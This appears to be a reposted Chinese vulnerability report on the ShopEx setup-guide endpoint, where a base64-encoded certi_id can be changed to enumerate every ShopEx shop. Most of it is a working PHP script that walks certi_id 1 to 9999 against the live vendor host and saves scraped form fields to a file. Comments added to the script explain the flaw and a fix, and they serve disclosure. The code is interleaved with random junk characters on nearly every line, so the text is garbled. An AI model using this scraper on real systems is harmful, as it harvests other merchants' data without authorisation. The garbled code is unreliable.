|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
5 p7 e; @7 P' Q) Z( a. q- \3 m: `$ m7 p
// Driver: calls ShowshopExD() once for every certi_id from 1 to 9999 — a
// sequential walk over identifiers that, per the report above, the remote
// endpoint accepts without tying them to the caller.
// Detection note (review): this traffic shape — one client hitting step2.php
// with monotonically increasing certi_id values inside the refer parameter —
// is the signal a WAF/log-correlation rule would key on.
for ($i=1; $i < 10000; $i++) { // enumerate certi_id values 1..9999
3 c, e4 T4 B" t$ q( V
ShowshopExD($i);/ A: O H. g. }$ v w
8 x1 I0 }% A3 c$ q( ^
}0 y. _* N3 ^& F
/**
 * Fetches the ShopEx setup-guide page (step2.php) for one certi_id and dumps
 * the name/value pairs of the text inputs found in the response.
 *
 * Security reading (review): the server identifies the tenant purely from the
 * certi_id carried in the client-supplied, base64-encoded `refer` parameter and
 * does not bind it to an authenticated caller, so any value is honoured — an
 * insecure direct object reference. The fix belongs server-side: derive the
 * certi_id from the session/credential, or reject a refer whose certi_id the
 * caller is not authorised for. callback_url is client-controlled as well;
 * presumably it drives a redirect after the wizard — verify, and if so it
 * needs an allow-list check.
 *
 * @param int|string $cid certi_id to query; coerced with intval() below.
 * @return void Results go to stdout and are appended to c:/shopEx.txt.
 */
7 g: B4 j- F; F! U8 b- W6 ? function ShowshopExD($cid) {
0 |. {8 M s G3 s- [3 u3 Y8 q# Q% Q2 {4 T
$url='http://guide.ecos.shopex.cn/step2.php';
. Y: Y _% S8 y) q. }/ r' B
// The refer payload is plain JSON wrapped in base64 — encoding, not
// authentication; the server cannot distinguish a forged refer from a real one.
+ D: z* ^* r0 p" d8 m2 _ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');6 U3 |/ q' y# g K
& \- V% H% ?4 E' H $url = $url.'?refer='.$refer; h8 w& f9 F3 q; c1 P% I' [1 B
" T% \) u- B+ B6 p5 J6 S" h: o# Y4 M
$ch = curl_init($url);
0 b/ b- H5 E b& z! \
. Y1 ^% F( C" \ s. L curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 L" _. E+ F9 E# Z6 a7 j2 ]( ~5 I8 w1 v) a8 D
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# \. z5 [' C5 W1 S/ D7 ?
+ F# a$ o1 u/ [& u $result = curl_exec($ch);: q1 C* W6 n5 r7 N) @8 y
& r, w1 ]$ R, ]. L+ P
// Re-encodes the response body from UTF-8 to GB2312 for console/file output.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");' U2 j0 k- x; Y1 q! u: L
// Heuristic for "this certi_id exists": the returned page reflects the refer value.
. {% P1 @- \2 C1 B/ L, K0 A( R' [ if(strpos($result,$refer))7 {& ^$ `8 T. y! c# o. P
2 U; P) p G, m% s8 I" }
{
: T9 b. G5 K3 ^/ y# m: O& x
- i% U7 p: ?" g) c $fp = fopen("c:/shopEx.txt",'ab'); // append the extracted fields to a local file
: S {: f' w& b' I. _4 t3 T" c
// First regex collects every <input type="text" .../> tag; the second pulls
// the name and value attributes out of each one.
K- V# M/ h$ d4 K- N preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
& A" }: ^. {- j
8 I9 p3 \/ l' d" q& | V foreach ($value[1] as $key) {% \+ w; H( @7 V8 c
8 g& @" m. |: c+ A; n$ [ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);% R' Z6 {* U3 `) T" O+ S% H6 h
2 H l& J8 w6 T echo $res[1][0].':'.$res[3][0]."\r\n";
' @/ H# Q- |9 @5 I
8 p3 t6 i, @, e; v+ `! m# H# r $col =$res[1][0].':'.$res[3][0]."\r\n"; % |- p) W/ M+ f5 k+ ^: y
, w: ~1 v# U. w d% N3 k2 s fwrite($fp, $col, strlen($col));
2 A" T! y; @1 C% ^
* g/ ?2 |9 D& _# ~+ p }( D- D5 z- J$ P. x, v' T! }; X5 v
" E# {/ O- A; k& G# d! r echo '--------------------------------'."\r\n";/ ]2 r: x% G7 `" W8 M* \4 S
* J: U7 S4 l7 ^$ ?& `2 N fclose($fp); + `6 e- k' q$ q! K" k) c* l
6 T- t! a; t6 J0 m$ l
}: X& U- Y9 `" ?' [6 ~
// Flushes buffered output and releases the curl handle for this id.
' c7 A5 T% O4 f7 K2 R0 I" w# z3 S flush();4 H5 r/ x- n+ ~: O# ~( A; Z$ S
8 x* b+ R4 @0 A6 q% \ curl_close($ch);: P( O. K9 F" h. c0 y% D
0 Y! }" l" o. m- q, F o6 \1 V$ q
}
. H1 I! z5 O/ j8 U
2 k. i1 ^& c8 Y; i# ~?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|